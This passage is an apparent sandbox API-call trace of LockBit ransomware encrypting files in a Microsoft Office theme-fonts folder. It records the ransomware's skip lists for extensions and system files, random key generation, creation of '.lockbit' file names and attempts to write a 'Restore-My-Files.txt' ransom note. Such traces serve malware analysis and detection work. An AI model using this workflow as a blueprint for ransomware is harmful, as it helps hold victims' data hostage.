lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.714] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Equity.xml") returned 1 [0195.714] lstrcmpiW (lpString1="ntldr", lpString2="Equity.xml") returned 1 [0195.714] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Equity.xml") returned 1 [0195.714] lstrcmpiW (lpString1="bootsect.bak", lpString2="Equity.xml") returned -1 [0195.714] lstrcmpiW (lpString1="autorun.inf", lpString2="Equity.xml") returned -1 [0195.714] lstrcmpiW (lpString1="thumbs.db", lpString2="Equity.xml") returned 1 [0195.714] lstrcmpiW (lpString1="iconcache.db", lpString2="Equity.xml") returned 1 [0195.715] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.715] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml") returned=".xml" [0195.715] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.715] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.715] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.716] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.716] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.716] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.716] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.716] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.716] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml.lockbit") returned 84 [0195.716] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\equity.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.717] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.717] malloc (_Size=0x40068) returned 0x3df0008 [0195.718] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3829) returned 1 [0195.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.719] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.724] malloc (_Size=0xbe) returned 0x1fa2ed8 [0195.724] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0195.725] free (_Block=0x1fa2ed8) [0195.725] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.725] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.725] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.725] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4741800, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4741800, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Essential.xml", cAlternateFileName="ESSENT~1.XML")) returned 1 [0195.725] lstrcmpiW (lpString1=".", lpString2="Essential.xml") returned -1 [0195.725] lstrcmpiW (lpString1="..", lpString2="Essential.xml") returned -1 [0195.725] PathFindExtensionW (pszPath="Essential.xml") returned=".xml" [0195.725] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.725] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.726] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Essential.xml") returned 1 [0195.727] lstrcmpiW (lpString1="ntldr", lpString2="Essential.xml") returned 1 [0195.727] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Essential.xml") returned 1 [0195.727] lstrcmpiW (lpString1="bootsect.bak", lpString2="Essential.xml") returned -1 [0195.727] lstrcmpiW (lpString1="autorun.inf", lpString2="Essential.xml") returned -1 [0195.727] lstrcmpiW (lpString1="thumbs.db", lpString2="Essential.xml") returned 1 [0195.727] lstrcmpiW (lpString1="iconcache.db", lpString2="Essential.xml") returned 1 [0195.727] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.727] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml") returned=".xml" [0195.727] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.727] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.727] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.728] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.728] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml.lockbit") returned 87 [0195.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\essential.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.730] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.730] malloc (_Size=0x40068) returned 0x3df0008 [0195.730] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3606) returned 1 [0195.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.731] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.736] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.736] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0195.736] free (_Block=0x1fa2ed8) [0195.736] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.736] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.736] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1655bb00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1655bb00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Executive.xml", cAlternateFileName="EXECUT~1.XML")) returned 1 [0195.736] lstrcmpiW (lpString1=".", lpString2="Executive.xml") returned -1 [0195.736] lstrcmpiW (lpString1="..", lpString2="Executive.xml") returned -1 [0195.736] PathFindExtensionW (pszPath="Executive.xml") returned=".xml" [0195.737] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.737] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.738] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Executive.xml") returned 1 [0195.738] lstrcmpiW (lpString1="ntldr", lpString2="Executive.xml") returned 1 [0195.738] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Executive.xml") returned 1 [0195.738] lstrcmpiW (lpString1="bootsect.bak", lpString2="Executive.xml") returned -1 [0195.738] lstrcmpiW (lpString1="autorun.inf", lpString2="Executive.xml") returned -1 [0195.739] lstrcmpiW (lpString1="thumbs.db", lpString2="Executive.xml") returned 1 [0195.739] lstrcmpiW (lpString1="iconcache.db", lpString2="Executive.xml") returned 1 [0195.739] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.739] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml") returned=".xml" [0195.739] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.739] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.739] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.740] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.740] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml.lockbit") returned 87 [0195.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\executive.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.742] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.742] malloc (_Size=0x40068) returned 0x3df0008 [0195.742] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3631) returned 1 [0195.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.743] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.748] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.748] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.748] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, 